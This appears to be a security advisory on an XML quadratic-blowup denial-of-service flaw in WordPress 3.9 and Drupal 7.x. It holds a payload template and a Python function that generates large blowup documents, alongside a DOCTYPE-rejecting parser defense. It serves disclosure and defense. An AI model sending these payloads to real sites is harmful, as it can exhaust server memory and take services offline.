WordPress 3.9 and Drupal 7.x Denial Of Service Vulnerability *video

2014-08-11 / 2014-08-24
Credit: breaksec
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

About the XML quadratic blowup attack: an XML quadratic blowup attack is a relative of the Billion Laughs attack (http://en.wikipedia.org/wiki/Billion_laughs). Both abuse entity expansion, but instead of nesting entities inside one another, quadratic blowup declares a single large entity (a few thousand characters) and references it many thousands of times, so the expanded text is the product of the entity length and the reference count while the document itself grows only linearly. A medium-sized XML document of roughly two hundred kilobytes can therefore cost the parser anywhere from one hundred MB to several GB of memory. Combining the large entity with a modest level of nested expansion raises the amplification factor further.

The payload has this shape (the entity value and the run of references are truncated):

<?xml version="1.0"?>
<!DOCTYPE DoS [
  <!ENTITY x "xxxxxxxxxxxxxxxxx...">
]>
<DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;...</DoS>

Exploit: http://cxsecurity.com/issue/WLB-2014080046
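Added example, not code from this advisory or from the breaksec write-up: it builds a quadratic-blowup document of the shape shown above, reports serialized size against expanded size so the ~200 KB to several GB ratio can be checked, and then shows the parser-side defense, refusing any untrusted document that carries a DOCTYPE before a tree is ever built. Python is used rather than the PHP of the affected applications because it shows both the payload construction and the defense with the standard library alone; every function and class name below is this example's own.

```python
"""Added example: build an XML quadratic-blowup document of the shape in the advisory,
measure how much it expands, and reject such input before a parser touches it.
Not code from the advisory or from breaksec; all names here are this example's own."""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


def build_quadratic_payload(entity_len: int, references: int, name: str = "x") -> bytes:
    """One entity of entity_len characters, referenced `references` times.

    The serialized document grows linearly (entity_len + 3 * references bytes, plus
    framing) while the expanded text grows as their product, hence "quadratic".
    """
    dtd = '<!DOCTYPE DoS [ <!ENTITY %s "%s"> ]>' % (name, "x" * entity_len)
    body = ("&%s;" % name) * references
    return ('<?xml version="1.0"?>\n%s\n<DoS>%s</DoS>' % (dtd, body)).encode("ascii")


def expansion(entity_len: int, references: int) -> tuple:
    """Return (serialized_bytes, expanded_bytes, amplification) without parsing anything."""
    serialized = len(build_quadratic_payload(entity_len, references))
    expanded = entity_len * references
    return serialized, expanded, expanded / serialized


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DTD (and so may declare entities)."""


def reject_dtd(data: bytes) -> None:
    """Abort at the first byte of a DOCTYPE, before any entity is declared or expanded.

    Internal entities can only be declared inside a DOCTYPE, so refusing the DOCTYPE
    blocks billion-laughs and quadratic blowup alike. Using expat's own hook rather than
    a byte-string search means encodings expat understands (UTF-16 etc.) cannot slip past.
    """
    parser = expat.ParserCreate()

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise UnsafeXML("DOCTYPE %r rejected: untrusted input may not declare entities" % doctype_name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def parse_untrusted(data: bytes) -> ET.Element:
    """Gate-then-parse: the expat pass above never builds a tree, so it is cheap."""
    reject_dtd(data)
    return ET.fromstring(data)


def is_safe(data: bytes) -> bool:
    """Convenience wrapper: True if parse_untrusted would accept the document."""
    try:
        parse_untrusted(data)
        return True
    except (UnsafeXML, ET.ParseError, expat.ExpatError):
        return False


if __name__ == "__main__":
    size, expanded, factor = expansion(50_000, 50_000)   # ~200 KB on the wire
    print("serialized %d bytes -> expanded %d bytes (x%.0f)" % (size, expanded, factor))
    print("payload accepted:", is_safe(build_quadratic_payload(10, 10)))
    print("benign accepted:", is_safe(b"<r><a>1</a></r>"))
```

With a 50,000-character entity referenced 50,000 times the document is about 200 KB but expands to 2.5 GB, which is the ratio the description above quotes. The defense deliberately rejects the DTD outright instead of trying to bound expansion: a limit on expansion depth does not stop quadratic blowup (there is no nesting to limit), and relying on a particular libexpat or libxml2 version's built-in amplification limits ties the application's safety to whatever the host happens to ship.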

References:

http://vimeo.com/102709635
http://www.breaksec.com/?p=6362
http://cxsecurity.com/issue/WLB-2014080046



Copyright 2024, cxsecurity.com
